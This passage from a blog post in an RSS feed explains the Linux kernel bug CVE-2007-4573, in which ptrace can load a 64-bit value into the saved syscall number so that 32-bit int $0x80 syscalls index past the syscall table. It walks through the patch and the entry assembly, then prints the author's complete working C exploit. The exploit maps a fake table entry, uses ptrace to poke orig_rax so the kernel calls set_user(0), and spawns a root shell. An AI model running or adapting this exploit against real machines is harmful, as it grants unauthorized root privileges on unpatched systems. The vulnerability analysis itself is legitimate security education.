+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>LOAD_ARGS32</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it replaces, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk of the <code>x86_64</code> architecture: writing to the
32-bit version of a register zeroes the top 32 bits of the full 64-bit
register. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>
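
<p>To make the difference concrete, here is a small C model of the two reload strategies. It is only a sketch: <code>reload_64</code> and <code>reload_32</code> are names I&#8217;ve made up for illustration, standing in for a single <code>movq</code> and a single <code>movl</code> from a saved stack slot.</p>

<pre><code>#include &lt;stdint.h&gt;

/* Models `movq slot,%rax`: all 64 bits of the saved slot are restored. */
uint64_t reload_64(uint64_t slot) {
        return slot;
}

/* Models `movl slot,%eax`: only the low 32 bits are read, and the
   write to the 32-bit register clears the top half of %rax. */
uint64_t reload_32(uint64_t slot) {
        return (uint32_t)slot;
}
</code></pre>

<p>With a saved value of <code>0x100000003</code>, <code>reload_64</code> hands back <code>0x100000003</code>, while <code>reload_32</code> hands back <code>0x3</code>.</p>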

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions of the entry points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. In other words, these are the entry points used by 32-bit processes
running on a 64-bit machine, and by 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>mov</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above suddenly matters.
As long as <code>%eax</code> is no greater than <code>(IA32_NR_syscalls-1)</code>, the bounds check passes, but <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>
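
<p>The mismatch can be modelled in a few lines of C. This is a sketch, not kernel code: <code>NR_SYSCALLS_ASSUMED</code> is a placeholder value I picked for illustration (the real <code>IA32_NR_syscalls</code> depends on the kernel version), and both function names are hypothetical.</p>

<pre><code>#include &lt;stdint.h&gt;

/* Placeholder table size, an assumption for this example only. */
#define NR_SYSCALLS_ASSUMED 320

/* Models `cmpl $(IA32_NR_syscalls-1),%eax; ja ia32_badsys`:
   only the low 32 bits of %rax take part in the comparison. */
int bounds_check_passes(uint64_t rax) {
        return (uint32_t)rax &lt;= NR_SYSCALLS_ASSUMED - 1;
}

/* Models `call *ia32_sys_call_table(,%rax,8)`: the byte offset into
   the table is computed from all 64 bits of %rax. */
uint64_t table_byte_offset(uint64_t rax) {
        return rax * 8;
}
</code></pre>

<p>For <code>rax = 1L &lt;&lt; 32</code>, the low 32 bits are all zero, so <code>bounds_check_passes</code> returns 1, yet <code>table_byte_offset</code> returns <code>0x800000000</code>, which is 32 GB past the start of the table.</p>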

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which, among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers before the system call proceeds.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall.</li>
<li>Have that process execute an <code>int $0x80</code>.</li>
<li>Have the parent set <code>%rax</code> in the child to a value that doesn&#8217;t fit in 32 bits, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table: so far off, in fact, that the address computation will wrap around past the end of
memory (on <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of the address space) and land at a low address. Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find the address of the function it should jump to in order to handle the system call.</p>
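
<p>As a worked example of the wrap-around, take the <code>ia32_sys_call_table</code> address used in the exploit code in this post (<code>0xffffffff8044b8a0</code>, which is specific to one kernel build) and an index of <code>1L &lt;&lt; 32</code>. Here is a sketch in C, with a hypothetical helper name:</p>

<pre><code>#include &lt;stdint.h&gt;

/* Address of the table slot the `call` reads for a given index.
   Unsigned arithmetic wraps modulo 2^64, which models the 64-bit
   address calculation. */
uint64_t slot_address(uint64_t table, uint64_t index) {
        return table + 8 * index;
}
</code></pre>

<p><code>slot_address(0xffffffff8044b8a0, 1L &lt;&lt; 32)</code> is <code>0x78044b8a0</code>: the sum overflows 64 bits and lands at roughly 30 GB, in the user half of the address space, where an unprivileged process can <code>mmap</code> a page.</p>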

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;signal.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into calling it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork into two processes. The parent will ptrace the child,
          and the child will execute the `int $0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  All we need to do in the parent is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into the saved
                  `%rax` (the `orig_rax` slot), and then detach and let
                  it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

